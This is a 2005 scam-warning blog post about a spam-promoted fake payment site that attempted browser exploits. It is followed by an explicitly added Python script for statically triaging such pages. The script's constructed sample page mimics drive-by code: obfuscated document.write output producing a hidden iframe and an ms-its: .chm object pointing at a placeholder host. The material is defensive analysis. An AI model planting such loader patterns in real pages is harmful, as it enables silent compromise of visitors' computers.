Current Status

This blog is not frequently updated because most case-by-case scam reports are now listed in subordinate blogs. At this point in time, most of my efforts are targeted at documenting employment scams in the Suckers Wanted blog.

2005-05-04

Hijack Alert: www.infra-pay.com

This is one of the nastier breeds of deception on the Internet: websites which actively attempt to exploit known bugs in common programs (here, the web browser), and thereby install various kinds of undesirable software on your computer. What kinds of software, you ask? Well, it varies, depending on the wants of the Man in the Black Hat. Maybe he'll get your computer to send spam on his behalf; maybe he can use it to host child pornography or phishing scams; maybe he wants to inspect your computer for useful personal data and passwords; maybe he just wants to on-sell your computer's services to some other person who will do one of these things.

Essentially, this is a hijacking attempt, but different from a vehicle hijacking in that you may not notice it has happened to you. It's generally in the hijacker's interests to be discreet about the process, otherwise you may get wise to the situation and kick him off. You may only notice that your Internet connection is very slow when he's using it to send spam, or similar. If you're lucky, your ISP will notice the suspicious activity being generated by your computer and isolate you from the rest of the Internet until you clear it up. Most ISPs don't do this: it's extra work, and most customers will feel indignant at being "cut off for no reason". But there is a reason, and being "cut off" is the best thing that can happen under the circumstances.

Enough with the introduction; now to business. I received a spam from 12.217.82.168 (12-217-82-168.client.mchsi.com) on Wed, 4 May 2005 15:27:56 -0000. This spam claimed to be from a new online payment service, and was a payment for me. The body text follows, with defanged hyperlinks for your added safety. I've also crossed out the "claim code", since it's possibly being used for tracking purposes, although I suspect it's an irrelevant distraction in this case.

You've just been sent money with Infra-Pay!
Amount: $1495.00
Memo: First part payment


To accept this payment, please go to http://www.infra-pay.com and enter your
claim code: xxxxxxxx.

If you do not wish to accept this payment, simply ignore this message and it
will automatically be canceled in 72 hours. You will also get a reminder to
claim your cash within the next 48 hours if you do not claim it now.

Infra-Pay.com is a new Internet payment system based on the newest payment
processing technologies. You will have the following options to withdraw your
money:

- Direct credit to your bank account in Australia, New Zealand or the
USA (usually takes 2 to 3 business days)
- Order a cheque (incurs a $2.50 fee)
- Order a free debit card (ATM withdrawal fees apply)
- E-mail money to someone else

To accept this payment, please go to http://www.infra-pay.com and enter your
claim code on the front page. Your claim code is xxxxxxxx.

(c) 2005 Infra-Pay.com. All rights reserved.

If your curiosity is piqued, and you go to the web site in question, you'll find a reasonably convincing mock-up of a payment processing site (so long as you don't inspect it too closely) containing a text-box into which you can enter your payment ID. What's supposed to happen when you enter something into the text box is that you get another page back which says, "Sorry, this transaction has been canceled by the sender!" and "Please ensure that your JavaScript settings are turned on, before using this option!" When I tried it out, however, there was a bug which prevented the correct page from being loaded, and I got an Apache-generated error page instead.

What you probably haven't noticed while all this is going on is that the web pages have been attempting to download various bits of software onto your computer so that the Man in the Black Hat can start to use your computer without your knowledge. So far as I can tell, this particular site is tuned for two distinct exploits: one for Internet Explorer on Windows XP with Service Pack 2; the other for slightly older versions of Windows and IE. Systems other than Microsoft Windows and Microsoft Internet Explorer appear not to be targeted. There is no attempt to phish for information beyond the "claim code" sent in the original spam.

The older exploit is the "CHM exploit": abuse of Internet Explorer's handling of compiled HTML Help (.chm) files, which let a web page load a remote .chm and execute the code it contains. The newer one (for SP2) involves a rather large amount of obfuscated JavaScript and embedded OBJECT references. If you want to investigate the files (the site is no longer available directly), I'm happy to share copies of them for the next seven days -- email me if you want them. At the time of investigation, the web site was hosted at 216.239.12.134 (no rDNS), which WHOIS reports as allocated to "ICNT INC" in Fargo, ND, USA. Neither their WHOIS record nor their website provides an "abuse" contact, so I haven't bothered trying to tell them about it.
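The safe way to look at pages like this is statically: never load them in a browser, just read the HTML, peel the obfuscation off the scripts, and list what they would have written into the page. The script below is an added example of that triage, not code from this blog and not the actual infra-pay.com pages (which are not reproduced here). The sample page is constructed for the example: it uses the example.invalid domain and placeholder file names, and merely imitates the pattern described above (unescape()/String.fromCharCode wrapped around document.write, a zero-size IFRAME, and an OBJECT pointing at a .chm via the ms-its: protocol handler that Internet Explorer used for compiled HTML Help).

```python
"""Static triage of a suspected drive-by page (added example, not the
original blog's code): extract script blocks, decode the common
unescape()/String.fromCharCode obfuscation layers, and list the
OBJECT/IFRAME tags and URLs they would produce, without executing anything."""
import re
from urllib.parse import unquote

# Constructed sample page for this example; domain and file names are placeholders.
SAMPLE_PAGE = r"""<html><body>
<h1>Infra-Pay</h1>
<form action="claim.php">Claim code: <input name="code"><input type="submit"></form>
<script>
document.write(unescape("%3Ciframe%20src%3D%22http%3A//example.invalid/sp2/load.htm%22%20width%3D%220%22%20height%3D%220%22%3E%3C/iframe%3E"));
</script>
<script>
document.write(String.fromCharCode(60,111,98,106,101,99,116,32,100,97,116,97,61,34,109,115,45,105,116,115,58,97,46,99,104,109,58,58,47,114,46,104,116,109,34,62) + "</object>");
</script>
</body></html>"""

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
TAG_RE = re.compile(r"<(object|iframe|embed|applet)\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*["']?([^"'\s>]+)""")
URL_RE = re.compile(r"""(?:https?|ms-its|file|ftp):[^\s"'<>)]+""", re.I)
UNESCAPE_RE = re.compile(r"""unescape\(\s*["']([^"']*)["']\s*\)""")
CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")


def _unescape_js(m: re.Match) -> str:
    # JavaScript unescape(): %uXXXX for 16-bit code units, %XX for bytes.
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda u: chr(int(u.group(1), 16)), m.group(1))
    return unquote(s)


def _from_char_code(m: re.Match) -> str:
    return "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())


def decode_js_escapes(text: str) -> str:
    """Peel unescape("...") and String.fromCharCode(...) layers off a script.
    Repeats until a pass changes nothing, so nested layers are handled too."""
    prev = None
    while prev != text:
        prev = text
        text = CHARCODE_RE.sub(_from_char_code, text)
        text = UNESCAPE_RE.sub(_unescape_js, text)
    return text


def triage(page: str) -> dict:
    """Return decoded scripts, the active-content tags they would write,
    every URL seen, and a list of flags worth a second look."""
    raw_scripts = SCRIPT_RE.findall(page)
    scripts = [decode_js_escapes(s) for s in raw_scripts]
    # Examine the page plus whatever the scripts would have written into it.
    expanded = page + "\n" + "\n".join(scripts)
    tags = [{"tag": name.lower(), **{k.lower(): v for k, v in ATTR_RE.findall(attrs)}}
            for name, attrs in TAG_RE.findall(expanded)]
    urls = sorted(set(URL_RE.findall(expanded)))

    flags = set()
    if any(d != r for d, r in zip(scripts, raw_scripts)):
        flags.add("obfuscated-script")
    for t in tags:
        if t["tag"] == "iframe" and t.get("width") == "0" and t.get("height") == "0":
            flags.add("hidden-iframe")
        if t["tag"] == "object" and "classid" in t:
            flags.add("activex-classid")
    if any(u.lower().startswith("ms-its:") or ".chm" in u.lower() for u in urls):
        flags.add("chm-reference")
    return {"scripts": scripts, "tags": tags, "urls": urls, "flags": sorted(flags)}


if __name__ == "__main__":
    report = triage(SAMPLE_PAGE)
    for key in ("flags", "urls", "tags"):
        print(f"{key}: {report[key]}")
```

Run it against a saved copy of the page rather than the live site; the decoder only handles the two escape layers shown, so a script that stays opaque after `decode_js_escapes` is itself a signal that something heavier (custom XOR, eval of a built-up string) is in play and deserves a look by hand.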
